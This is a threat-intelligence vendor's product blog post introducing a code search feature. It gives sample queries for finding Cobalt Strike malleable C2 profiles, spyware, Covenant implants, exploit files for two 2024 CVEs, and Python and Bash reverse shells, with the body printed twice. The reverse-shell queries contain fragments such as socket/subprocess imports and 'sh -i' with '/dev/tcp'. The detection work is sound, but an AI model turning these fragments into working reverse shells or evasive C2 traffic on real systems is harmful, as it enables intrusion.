Introducing Code Search on AttackCapture: Uncover Exploit Code, Reverse Shells, C2 Configs, and More
Published on
Published on
Published on
Oct 15, 2024
Oct 15, 2024
Oct 15, 2024
Overview
Spotting malicious code across extensive collections of files can be daunting, especially as attackers constantly use new obfuscation libraries to hinder analysis. That's where Code Search, a powerful feature within our Attack Capture platform, comes into play. This tool allows security teams and researchers to efficiently scan through diverse file types to detect indicators of compromise (IoCs), such as exploit code, reverse shells, and C2 configurations.
In our recent post introducing Attack Capture, we discussed how the platform uncovers and categorizes attacker burner instances, indexing everything from recon tools and malware to remote exploits and exfiltration methods. Code Search enables threat hunters to locate and analyze specific attack patterns, such as unique Cobalt Strike configurations--all accessible for preview and download.
Cobalt Strike Profiles
Cobalt Strike is a feature-rich post-exploitation tool often repurposed by cyber criminals and APT groups to manage command-and-control (C2) operations. Malleable C2 profiles allow attackers to customize network traffic--such as HTTP headers and URIs--to mimic legitimate services (Microsoft, Google, Amazon, etc.) or other adversaries, making it an ideal tool for evading detection.
Malleable C2 profiles leverage a Data Transform Language that statements and data structures, aiding in their identification across files. In the following examples, we'll highlight specific Code Search queries designed to locate Malleable profiles across thousands of open directories, revealing patterns that adversaries use.
Profile: jquery-3.3.2
Code Search Query: set uri /jquery-3.3.2.min.js" AND "set OU Certificate Authority
Brief Description: This profile is designed to mimic requests for the popular JavaScript jQuery library. Due to its ability to appear as benign traffic, this profile has seen repeated use by adversaries attempting to evade monitoring within targeted networks.
Profile: Cobalt Strike 4.9
Code Search Query: header Server gsw" AND "set module_x86 netshell.dll
Brief Description: In late August, Michael Koczwara posted on using AttackCapture to uncover Cobalt Strike servers using unique or custom malleable profiles. He showcased a Malleable C2 profile for Cobalt Strike 4.9, which had not been publicly reported. Our queries are straightforward, using a keyword with a simple "AND" statement.
Profile: geacon_plus
Code Search Query: set uri /www/handle/doc" AND "set OU NN Fern
Brief Description: geacon_plus is a Golang-based variant of the Cobalt Strike beacon, designed for cross-platform use, including macOS, Linux, and Windows systems. This version uses unique TLS certificate fields, which can be leveraged to identify infrastructure during network scans.
EagleSpy Malware
EagleSpy is a powerful Android spyware tool that covertly gathers data from infected devices, including contacts, messages, and location details. Using Telegram's Bot API, it relays this stolen information directly to the attacker's infrastructure.
Code Search Query: EagleSpy
Brief Description: The above query showcases the power of full-text search. With just one word, we can quickly identify multiple HTML files using the distinctive @EagleSpy identifier located within the code. You may recognize the IP address in Figure 5 from our previous research into a cybercriminal's exposed server.
Covenant Grunt Implants
Covenant is an open-source, .NET-based C2 framework commonly used in red team operations for managing post-exploitation activities. Its primary implant, a "Grunt," executes commands on compromised systems, enabling tasks like lateral movement and credential theft. Covenant has been observed in numerous cyberattacks despite its intended use by penetration testers, where adversaries deploy Grunt agents to control victim networks.
Code Search Query: Grunt.GruntStager
Description: Each Grunt is generated through Covenant's web interface, where operators can customize the stager type and communication parameters. The above query looks for implants exposed on open directories prepped for delivery.
Python & Bash Reverse Shells
Python and Bash reverse shells are tools commonly used in both malicious operations and legitimate security testing to gain remote access to target systems. They enable a malicious actor, or penetration tester, to bypass typical firewall rules by having the compromised machine initiate an outbound connection back to the control server.
Python reverse shells are valued for their flexibility and cross-platform capabilities, while Bash reverse shells are straightforward and frequently used on Unix systems. These shells are crucial for simulating real-world attacks, as they help assess vulnerabilities that an adversary on target could exploit.
Python Shells
Code Search Query: ("s=socket.socket" OR "import socket,subprocess,os")AND ("/bin/bash" OR "/bin/sh") AND "-i"
Description: This query is a bit more complicated than the previous ones as it uses both "AND" and "OR" operators to combine keywords, in addition to parenthesis. Our goal in this particular query is to filter for common elements found in reverse shells, specifically socket connections, and the use of Bash for interactive shells.
Bash Shells
Code Search Query: sh -i" AND "/dev/tcp
Description: The Bash query identifies code that uses the shorthand "sh -i" for an interactive shell, combined with "/dev/tcp" to establish network connections. The "AND" operator helps pinpoint scripts that set up reverse shells over TCP, a common method for initiating connections to external servers.
Exploit Code
Our final section explores the discovery of exploit code associated with known Common Vulnerabilities and Exposures (CVEs) within the open directories curated by AttackCapture. Finding this code provides defenders with a crucial perspective on how malicious actors might attempt to exploit vulnerabilities. This intelligence empowers security teams to anticipate attacker tactics and fortify network defenses, allowing for proactive preparation before a potential breach occurs.
CVE-2024-6387
Code Search Query: 7etsuo-regreSSHion.c
Description: Here, we are explicitly searching for the use of a C file named "7etsuo-regreSSHion.c," which contains code for the RegreSSHion exploit. This vulnerability affects SSH implementations, allowing attackers to potentially gain unauthorized access to systems. By targeting this file name, the query helps quickly locate instances where the RegreSSHion exploit may be present in open directories.
CVE-2024-29895
Code Search Query: /cacti/cmd_realtime.php
Description: The final query targets the cmd_realtime.php file in Cacti, which was vulnerable to command injection. This flaw affected Cacti versions on the 1.3.x DEV branch and allowed unauthenticated users to execute arbitrary commands on the server. In Figure 11 below, we see a few Python variations of the exploit and instances of the Nuclei scanner, likely used to check server exposure to the vulnerability.
Conclusion
Code Search within AttackCapture gives defenders the ability to uncover a wide range of malicious code, from exploits and reverse shells to C2 configurations, just to name a few. This feature helps security teams gain insights into potential threats and proactively bolster defenses against evolving attack methods. As we continue to expand CodeSearch to include additional configurations like Havoc C2 (Coming Soon!), we invite your feedback on other file types or features that would enhance your threat-hunting capabilities.
Overview
Spotting malicious code across extensive collections of files can be daunting, especially as attackers constantly use new obfuscation libraries to hinder analysis. That's where Code Search, a powerful feature within our Attack Capture platform, comes into play. This tool allows security teams and researchers to efficiently scan through diverse file types to detect indicators of compromise (IoCs), such as exploit code, reverse shells, and C2 configurations.
In our recent post introducing Attack Capture, we discussed how the platform uncovers and categorizes attacker burner instances, indexing everything from recon tools and malware to remote exploits and exfiltration methods. Code Search enables threat hunters to locate and analyze specific attack patterns, such as unique Cobalt Strike configurations--all accessible for preview and download.
Cobalt Strike Profiles
Cobalt Strike is a feature-rich post-exploitation tool often repurposed by cyber criminals and APT groups to manage command-and-control (C2) operations. Malleable C2 profiles allow attackers to customize network traffic--such as HTTP headers and URIs--to mimic legitimate services (Microsoft, Google, Amazon, etc.) or other adversaries, making it an ideal tool for evading detection.
Malleable C2 profiles leverage a Data Transform Language that statements and data structures, aiding in their identification across files. In the following examples, we'll highlight specific Code Search queries designed to locate Malleable profiles across thousands of open directories, revealing patterns that adversaries use.
Profile: jquery-3.3.2
Code Search Query: set uri /jquery-3.3.2.min.js" AND "set OU Certificate Authority
Brief Description: This profile is designed to mimic requests for the popular JavaScript jQuery library. Due to its ability to appear as benign traffic, this profile has seen repeated use by adversaries attempting to evade monitoring within targeted networks.
Profile: Cobalt Strike 4.9
Code Search Query: header Server gsw" AND "set module_x86 netshell.dll
Brief Description: In late August, Michael Koczwara posted on using AttackCapture to uncover Cobalt Strike servers using unique or custom malleable profiles. He showcased a Malleable C2 profile for Cobalt Strike 4.9, which had not been publicly reported. Our queries are straightforward, using a keyword with a simple "AND" statement.
Profile: geacon_plus
Code Search Query: set uri /www/handle/doc" AND "set OU NN Fern
Brief Description: geacon_plus is a Golang-based variant of the Cobalt Strike beacon, designed for cross-platform use, including macOS, Linux, and Windows systems. This version uses unique TLS certificate fields, which can be leveraged to identify infrastructure during network scans.
EagleSpy Malware
EagleSpy is a powerful Android spyware tool that covertly gathers data from infected devices, including contacts, messages, and location details. Using Telegram's Bot API, it relays this stolen information directly to the attacker's infrastructure.
Code Search Query: EagleSpy
Brief Description: The above query showcases the power of full-text search. With just one word, we can quickly identify multiple HTML files using the distinctive @EagleSpy identifier located within the code. You may recognize the IP address in Figure 5 from our previous research into a cybercriminal's exposed server.
Covenant Grunt Implants
Covenant is an open-source, .NET-based C2 framework commonly used in red team operations for managing post-exploitation activities. Its primary implant, a "Grunt," executes commands on compromised systems, enabling tasks like lateral movement and credential theft. Covenant has been observed in numerous cyberattacks despite its intended use by penetration testers, where adversaries deploy Grunt agents to control victim networks.
Code Search Query: Grunt.GruntStager
Description: Each Grunt is generated through Covenant's web interface, where operators can customize the stager type and communication parameters. The above query looks for implants exposed on open directories prepped for delivery.
Python & Bash Reverse Shells
Python and Bash reverse shells are tools commonly used in both malicious operations and legitimate security testing to gain remote access to target systems. They enable a malicious actor, or penetration tester, to bypass typical firewall rules by having the compromised machine initiate an outbound connection back to the control server.
Python reverse shells are valued for their flexibility and cross-platform capabilities, while Bash reverse shells are straightforward and frequently used on Unix systems. These shells are crucial for simulating real-world attacks, as they help assess vulnerabilities that an adversary on target could exploit.
Python Shells
Code Search Query: ("s=socket.socket" OR "import socket,subprocess,os")AND ("/bin/bash" OR "/bin/sh") AND "-i"
Description: This query is a bit more complicated than the previous ones as it uses both "AND" and "OR" operators to combine keywords, in addition to parenthesis. Our goal in this particular query is to filter for common elements found in reverse shells, specifically socket connections, and the use of Bash for interactive shells.
Bash Shells
Code Search Query: sh -i" AND "/dev/tcp
Description: The Bash query identifies code that uses the shorthand "sh -i" for an interactive shell, combined with "/dev/tcp" to establish network connections. The "AND" operator helps pinpoint scripts that set up reverse shells over TCP, a common method for initiating connections to external servers.
Exploit Code
Our final section explores the discovery of exploit code associated with known Common Vulnerabilities and Exposures (CVEs) within the open directories curated by AttackCapture. Finding this code provides defenders with a crucial perspective on how malicious actors might attempt to exploit vulnerabilities. This intelligence empowers security teams to anticipate attacker tactics and fortify network defenses, allowing for proactive preparation before a potential breach occurs.
CVE-2024-6387
Code Search Query: 7etsuo-regreSSHion.c
Description: Here, we are explicitly searching for the use of a C file named "7etsuo-regreSSHion.c," which contains code for the RegreSSHion exploit. This vulnerability affects SSH implementations, allowing attackers to potentially gain unauthorized access to systems. By targeting this file name, the query helps quickly locate instances where the RegreSSHion exploit may be present in open directories.
CVE-2024-29895
Code Search Query: /cacti/cmd_realtime.php
Description: The final query targets the cmd_realtime.php file in Cacti, which was vulnerable to command injection. This flaw affected Cacti versions on the 1.3.x DEV branch and allowed unauthenticated users to execute arbitrary commands on the server. In Figure 11 below, we see a few Python variations of the exploit and instances of the Nuclei scanner, likely used to check server exposure to the vulnerability.
Conclusion
Code Search within AttackCapture gives defenders the ability to uncover a wide range of malicious code, from exploits and reverse shells to C2 configurations, just to name a few. This feature helps security teams gain insights into potential threats and proactively bolster defenses against evolving attack methods. As we continue to expand CodeSearch to include additional configurations like Havoc C2 (Coming Soon!), we invite your feedback on other file types or features that would enhance your threat-hunting capabilities.
Related Posts:
Discover Hunt.io's 2024 highlights: major product launches, innovations like AttackCapture™, C2 Feed, and Hunt SQL, and a look ahead to 2025.
Discover Hunt.io's 2024 highlights: major product launches, innovations like AttackCapture™, C2 Feed, and Hunt SQL, and a look ahead to 2025.
Our latest analysis uncovers domains linked to the Oyster backdoor, revealing suspected Vanilla Tempest infrastructure and offering insights into server configuration patterns.
Our latest analysis uncovers domains linked to the Oyster backdoor, revealing suspected Vanilla Tempest infrastructure and offering insights into server configuration patterns.
Learn how the 'Million OK!!!' HTTP response previously linked to Kimsuky has reappeared on new IPs and domains. This update provides the latest insights into evolving infrastructure, helping defenders stay informed on potential North Korean threat activity.
Learn how the 'Million OK!!!' HTTP response previously linked to Kimsuky has reappeared on new IPs and domains. This update provides the latest insights into evolving infrastructure, helping defenders stay informed on potential North Korean threat activity.
Discover how the MoqHao campaign leveraging iCloud and VK employs cross-platform tactics to steal credentials and distribute malicious APKs.
Discover how the MoqHao campaign leveraging iCloud and VK employs cross-platform tactics to steal credentials and distribute malicious APKs.
Discover Hunt.io's 2024 highlights: major product launches, innovations like AttackCapture™, C2 Feed, and Hunt SQL, and a look ahead to 2025.
Our latest analysis uncovers domains linked to the Oyster backdoor, revealing suspected Vanilla Tempest infrastructure and offering insights into server configuration patterns.
Threat Hunting Platform - Hunt.io
Products
Hunt Intelligence, Inc.
Threat Hunting Platform - Hunt.io
Products
Hunt Intelligence, Inc.
Threat Hunting Platform - Hunt.io
Products
Hunt Intelligence, Inc.